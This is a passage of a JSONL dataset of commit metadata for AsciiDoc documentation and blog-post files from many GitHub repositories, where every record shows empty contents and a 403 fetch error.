Stacey-Gammon\/elasticsearch,fernandozhu\/elasticsearch,IanvsPoplicola\/elasticsearch,alexshadow007\/elasticsearch,fforbeck\/elasticsearch,njlawton\/elasticsearch,maddin2016\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JervyShi\/elasticsearch,gmarz\/elasticsearch,lks21c\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,mikemccand\/elasticsearch,nezirus\/elasticsearch,fernandozhu\/elasticsearch,HonzaKral\/elasticsearch,artnowo\/elasticsearch,a2lin\/elasticsearch,markwalkom\/elasticsearch,sneivandt\/elasticsearch,coding0011\/elasticsearch,scottsom\/elasticsearch,strapdata\/elassandra,fred84\/elasticsearch,MaineC\/elasticsearch,robin13\/elasticsearch,kalimatas\/elasticsearch,JSCooke\/elasticsearch,s1monw\/elasticsearch,wenpos\/elasticsearch,ThiagoGarciaAlves\/elasticsearch","old_file":"docs\/reference\/getting-started.asciidoc","new_file":"docs\/reference\/getting-started.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f660ad13adea75cd77fe6e59e6733acf913920b5","subject":"Update 2017-01-03-The-Naming-Problem.adoc","message":"Update 2017-01-03-The-Naming-Problem.adoc","repos":"ncomet\/asciiblog,ncomet\/asciiblog,ncomet\/asciiblog,ncomet\/asciiblog","old_file":"_posts\/2017-01-03-The-Naming-Problem.adoc","new_file":"_posts\/2017-01-03-The-Naming-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ncomet\/asciiblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9dd49c797745bd325cb62de34813b85b992147b8","subject":"Update 2018-11-27-Log-enter-and-exit.adoc","message":"Update 2018-11-27-Log-enter-and-exit.adoc","repos":"sfoubert\/sfoubert.github.io,sfoubert\/sfoubert.github.io,sfoubert\/sfoubert.github.io,sfoubert\/sfoubert.github.io","old_file":"_posts\/2018-11-27-Log-enter-and-exit.adoc","new_file":"_posts\/2018-11-27-Log-enter-and-exit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sfoubert\/sfoubert.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4a35773493f85a7e3e239ea2f07e291ef285aeb","subject":"Update 2016-08-04-Very-first-Post-of-my-own-Blog.adoc","message":"Update 2016-08-04-Very-first-Post-of-my-own-Blog.adoc","repos":"amuhle\/amuhle.github.io,amuhle\/amuhle.github.io,amuhle\/amuhle.github.io,amuhle\/amuhle.github.io","old_file":"_posts\/2016-08-04-Very-first-Post-of-my-own-Blog.adoc","new_file":"_posts\/2016-08-04-Very-first-Post-of-my-own-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/amuhle\/amuhle.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b1141da918660758786fcccbcd93eae8f32e71a","subject":":memo: Selenide code tips","message":":memo: Selenide code tips\n","repos":"syon\/refills","old_file":"src\/refills\/selenium\/selenide-tips.adoc","new_file":"src\/refills\/selenium\/selenide-tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9327153a61a6dd97bc0c2c58d54f2164782231d","subject":"doc: userguide: add extend\/trunc doc","message":"doc: userguide: add extend\/trunc doc\n\nAdd additional information about the new APIs:\nodp_packet_extend_head() \/ odp_packet_trunc_head()\nodp_packet_extend_tail() \/ odp_packet_trunc_tail()\n\nSigned-off-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nReviewed-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\nSigned-off-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\n","repos":"ravineet-singh\/odp,nmorey\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,erachmi\/odp,dkrot\/odp,dkrot\/odp,mike-holmes-linaro\/odp,nmorey\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,erachmi\/odp,nmorey\/odp,dkrot\/odp,dkrot\/odp,nmorey\/odp,erachmi\/odp,mike-holmes-linaro\/odp,erachmi\/odp","old_file":"doc\/users-guide\/users-guide-packet.adoc","new_file":"doc\/users-guide\/users-guide-packet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"2c5f912c3d2321b899c5a55a88d0903abde3010f","subject":"Added the sagan adoc files","message":"Added the sagan adoc files\n\nResolves #1700\n","repos":"ilayaperumalg\/spring-cloud-stream,ilayaperumalg\/spring-cloud-stream,garyrussell\/spring-cloud-stream,garyrussell\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,garyrussell\/spring-cloud-stream","old_file":"docs\/src\/main\/asciidoc\/sagan-index.adoc","new_file":"docs\/src\/main\/asciidoc\/sagan-index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ilayaperumalg\/spring-cloud-stream.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"53e87f85c5b549607625f2d9190e1d2bd35b812f","subject":"Update 2016-02-19-Java-Flags.adoc","message":"Update 2016-02-19-Java-Flags.adoc","repos":"azubkov\/azubkov.github.io,azubkov\/azubkov.github.io,azubkov\/azubkov.github.io","old_file":"_posts\/2016-02-19-Java-Flags.adoc","new_file":"_posts\/2016-02-19-Java-Flags.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/azubkov\/azubkov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8eb9274d68583a81e8b6af0645c5c3962f43ba4c","subject":"[narada-base] Merge branch 'master' into socklog","message":"[narada-base] Merge branch 'master' into socklog\n","repos":"qarea\/planningms,qarea\/jirams,qarea\/planningms,qarea\/jirams","old_file":"doc\/narada-base.adoc","new_file":"doc\/narada-base.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qarea\/jirams.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e73ced207a3be5017548a394d343d70a9ebc7278","subject":"Update 2016-10-18-Making-Businesses.adoc","message":"Update 2016-10-18-Making-Businesses.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2016-10-18-Making-Businesses.adoc","new_file":"_posts\/2016-10-18-Making-Businesses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa629864167f21dafc96dd8013c8fc95c6a0c835","subject":"Update 2015-09-20-Python-re-module.adoc","message":"Update 2015-09-20-Python-re-module.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Python-re-module.adoc","new_file":"_posts\/2015-09-20-Python-re-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d19c3ad2b0c90a7fd07b0f992c4efebc87ab7452","subject":"Update 2019-01-31-It-is-but-a-Test.adoc","message":"Update 2019-01-31-It-is-but-a-Test.adoc","repos":"deivisk\/deivisk.github.io,deivisk\/deivisk.github.io,deivisk\/deivisk.github.io,deivisk\/deivisk.github.io","old_file":"_posts\/2019-01-31-It-is-but-a-Test.adoc","new_file":"_posts\/2019-01-31-It-is-but-a-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deivisk\/deivisk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"364c94ac5df16bfae4ad67d061ce82c0a2335bcc","subject":"Update 2020-01-17-wonder.adoc","message":"Update 2020-01-17-wonder.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2020-01-17-wonder.adoc","new_file":"_posts\/2020-01-17-wonder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d8793a0fd57896e767959b009c2469125cf3e10","subject":"Update 2016-04-14-Inyeccion-L-D-A-P.adoc","message":"Update 2016-04-14-Inyeccion-L-D-A-P.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-14-Inyeccion-L-D-A-P.adoc","new_file":"_posts\/2016-04-14-Inyeccion-L-D-A-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36032eda22f81364318f75da29205e3248cd1a67","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a14b59b986fb8f7d077b789b036ecf454414ed5e","subject":"Update 2016-08-13-Meu-primeiro-post.adoc","message":"Update 2016-08-13-Meu-primeiro-post.adoc","repos":"emtudo\/emtudo.github.io,emtudo\/emtudo.github.io,emtudo\/emtudo.github.io,emtudo\/emtudo.github.io","old_file":"_posts\/2016-08-13-Meu-primeiro-post.adoc","new_file":"_posts\/2016-08-13-Meu-primeiro-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/emtudo\/emtudo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"410836b4f91e1aef540ce35c80c9445a35e8fc96","subject":"update httpd post","message":"update httpd post\n","repos":"jbosschina\/openshift-cookbooks","old_file":"linux\/svc\/httpd.adoc","new_file":"linux\/svc\/httpd.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbosschina\/openshift-cookbooks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c7ca394cc83754bffbdfae3c91b882dea4c64377","subject":"Update 2016-07-03-Rights-and-Duties.adoc","message":"Update 2016-07-03-Rights-and-Duties.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f388490df4fdd29906ea4e8ca790b4b47e0c9239","subject":"adding documentation for gt\/e-lt\/e filtering on multiple fields","message":"adding documentation for gt\/e-lt\/e filtering on multiple fields\n","repos":"djangonauts\/django-hstore,pombredanne\/django-hstore,pombredanne\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,Stranger6667\/django-hstore,Stranger6667\/django-hstore,pombredanne\/django-hstore","old_file":"doc\/doc.asciidoc","new_file":"doc\/doc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djangonauts\/django-hstore.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68fd7ae0f072b1c53c949cc53c78b6ee1f3c0d56","subject":"Update 2015-03-30-Premiere-version-V0.adoc","message":"Update 2015-03-30-Premiere-version-V0.adoc","repos":"Fendi-project\/fendi-project.github.io,Fendi-project\/fendi-project.github.io,Fendi-project\/fendi-project.github.io","old_file":"_posts\/2015-03-30-Premiere-version-V0.adoc","new_file":"_posts\/2015-03-30-Premiere-version-V0.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Fendi-project\/fendi-project.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8d52d23840112cd7143e46270c6a99172280068","subject":"add datadog guide","message":"add datadog guide","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/metrics-datadog.adoc","new_file":"userguide\/tutorials\/metrics-datadog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ccd9ae8327fd0cc86638554c4ce187d88e7f6c3d","subject":"Update 2015-09-17-drupal_add_js.adoc","message":"Update 2015-09-17-drupal_add_js.adoc","repos":"tom-konda\/blog,tom-konda\/blog,tom-konda\/blog,tom-konda\/blog","old_file":"_posts\/2015-09-17-drupal_add_js.adoc","new_file":"_posts\/2015-09-17-drupal_add_js.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tom-konda\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9580b0a2a2b85bc77d233c34c6e27d55208fa63f","subject":"Add the bonjour documentation","message":"Add the bonjour documentation\n","repos":"redhat-reactive-msa\/redhat-reactive-msa","old_file":"service-bonjour.adoc","new_file":"service-bonjour.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-reactive-msa\/redhat-reactive-msa.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ea77b6a01f8ba4ddc7e0d10ebd39243d2b618b8e","subject":"Further notes auto inst","message":"Further notes auto inst\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Automated Eclipse install.adoc","new_file":"Dev tools\/Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f78e1f0c774b54375c4799bf78606f912e169901","subject":"Renamed '_posts\/2019-01-31-Hello-Github-World.adoc' to '_posts\/2017-07-14-Hello-Github-World.adoc'","message":"Renamed '_posts\/2019-01-31-Hello-Github-World.adoc' to '_posts\/2017-07-14-Hello-Github-World.adoc'","repos":"mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io","old_file":"_posts\/2017-07-14-Hello-Github-World.adoc","new_file":"_posts\/2017-07-14-Hello-Github-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkhymohamed\/mkhymohamed.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0934824d8bb7929672378a05fff1713098e86e61","subject":"Update 2011-07-23-1659-SSLTLS-un-probleme-frequent.adoc","message":"Update 2011-07-23-1659-SSLTLS-un-probleme-frequent.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2011-07-23-1659-SSLTLS-un-probleme-frequent.adoc","new_file":"_posts\/2011-07-23-1659-SSLTLS-un-probleme-frequent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cacf79567ec29096a247fbeb8aac6dde58c468c","subject":"Update 2014-09-29-Learning-Programming-the-Backlog.adoc","message":"Update 2014-09-29-Learning-Programming-the-Backlog.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-09-29-Learning-Programming-the-Backlog.adoc","new_file":"_posts\/2014-09-29-Learning-Programming-the-Backlog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33d847c0b6fb5a64e0c5f913727bd7bbe4edb1d2","subject":"y2b create post Probably The Weirdest Gadget Yet...","message":"y2b create post Probably The Weirdest Gadget Yet...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-20-Probably-The-Weirdest-Gadget-Yet.adoc","new_file":"_posts\/2017-04-20-Probably-The-Weirdest-Gadget-Yet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ade5ec778ab4a5dd5aee1fd23dafe394f0c4d621","subject":"Update 2016-10-06-Un-premier-article.adoc","message":"Update 2016-10-06-Un-premier-article.adoc","repos":"sebprev\/blog,sebprev\/blog,sebprev\/blog,sebprev\/blog","old_file":"_posts\/2016-10-06-Un-premier-article.adoc","new_file":"_posts\/2016-10-06-Un-premier-article.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebprev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6f3d14f3b60667f1ebd95df71e89d562447edb6","subject":"Update 2017-11-22-Ideas-that-made-it.adoc","message":"Update 2017-11-22-Ideas-that-made-it.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-11-22-Ideas-that-made-it.adoc","new_file":"_posts\/2017-11-22-Ideas-that-made-it.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1bfdb81feb88898e215fcd1772d9a550f9e7335","subject":"Update 2017-12-08-A-W-S-Cloud9golang.adoc","message":"Update 2017-12-08-A-W-S-Cloud9golang.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-A-W-S-Cloud9golang.adoc","new_file":"_posts\/2017-12-08-A-W-S-Cloud9golang.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24a7108df2a370321ebadc065b373eac28b7e148","subject":"Update 2016-07-03-Rights-and-Duties.adoc","message":"Update 2016-07-03-Rights-and-Duties.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05449c222b5a19925c836f0583c818edaf281381","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/05\/13\/deref.adoc","new_file":"content\/news\/2022\/05\/13\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"1a1b600956c91c0043780853a69d72de3a92491f","subject":"Forge 3.0.0.Beta4","message":"Forge 3.0.0.Beta4\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-01-27-forge-3.0.0.beta4.asciidoc","new_file":"news\/2016-01-27-forge-3.0.0.beta4.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e29a20db42dbe061daf031eb09ae278afa789b27","subject":"Add documentation for Consul extension","message":"Add documentation for Consul extension\n\nCo-authored-by: Guillaume Smet <a1413ddfdc82e6e4d34146c884b8167946ce8263@gmail.com>\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/consul-config.adoc","new_file":"docs\/src\/main\/asciidoc\/consul-config.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d03f4a740641a7d6669f2fe4b2b53cbb476a3984","subject":"Update 2017-10-07-Privacy-Policy-for-coders-Dilemma.adoc","message":"Update 2017-10-07-Privacy-Policy-for-coders-Dilemma.adoc","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2017-10-07-Privacy-Policy-for-coders-Dilemma.adoc","new_file":"_posts\/2017-10-07-Privacy-Policy-for-coders-Dilemma.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a408a85b6c33f76c390f755cc87e6ce750de34cc","subject":"Publish 19-02-2015-Manual-de-Git-En-Espanol.adoc","message":"Publish 19-02-2015-Manual-de-Git-En-Espanol.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"19-02-2015-Manual-de-Git-En-Espanol.adoc","new_file":"19-02-2015-Manual-de-Git-En-Espanol.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6e9f87b6e6af3b69c85f32666dca2a3a1d65081","subject":"Papyrus incubation auto inst","message":"Papyrus incubation auto inst\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Automated Eclipse install.adoc","new_file":"Dev tools\/Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db9f3971c6e78a9649f13b8b2e465f54dee66fb1","subject":"KUDU-661 Continuing work bsaed on Todd's feedback","message":"KUDU-661 Continuing work bsaed on Todd's feedback\n\nChange-Id: Ie14a71d00c76dc92fb01a3902a43ec435ae8110c\nReviewed-on: http:\/\/gerrit.sjc.cloudera.com:8080\/6467\nReviewed-by: Michael Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@cloudera.com>\nTested-by: Michael Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@cloudera.com>\n","repos":"EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu","old_file":"docs\/quickstart.adoc","new_file":"docs\/quickstart.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"72eb50d3f3f9e2a8b2e28fba861d4404e94151a0","subject":"add user guide","message":"add user guide\n","repos":"ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor,ECP-CANDLE\/Supervisor","old_file":"docs\/user_guide.adoc","new_file":"docs\/user_guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ECP-CANDLE\/Supervisor.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"228e8465d3d80088872459b2bfcf3fc22b799464","subject":"y2b create post THE BOOTY MACHINE","message":"y2b create post THE BOOTY MACHINE","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-01-09-THE-BOOTY-MACHINE.adoc","new_file":"_posts\/2016-01-09-THE-BOOTY-MACHINE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c362216e2ddeed6001e32a378c8b9a68934f2c6","subject":"Publish 2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","message":"Publish 2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","new_file":"2015-8-20-AWS-ChinaBeijing-Region-Tips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"814c0db41264cd4f27d6a88cc8c89a25a73d2068","subject":"Update 2018-09-10-Go.adoc","message":"Update 2018-09-10-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-10-Go.adoc","new_file":"_posts\/2018-09-10-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"091036152620726095a6c64ef10b584c6c6254a0","subject":"y2b create post 3 Cool Tech Deals - #5","message":"y2b create post 3 Cool Tech Deals - #5","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-07-15-3-Cool-Tech-Deals--5.adoc","new_file":"_posts\/2015-07-15-3-Cool-Tech-Deals--5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48336d6ac89bbec6609d7bb4f4685428c0e3f25b","subject":"y2b create post iPhone 7 Case Leak!","message":"y2b create post iPhone 7 Case Leak!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-03-17-iPhone-7-Case-Leak.adoc","new_file":"_posts\/2016-03-17-iPhone-7-Case-Leak.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 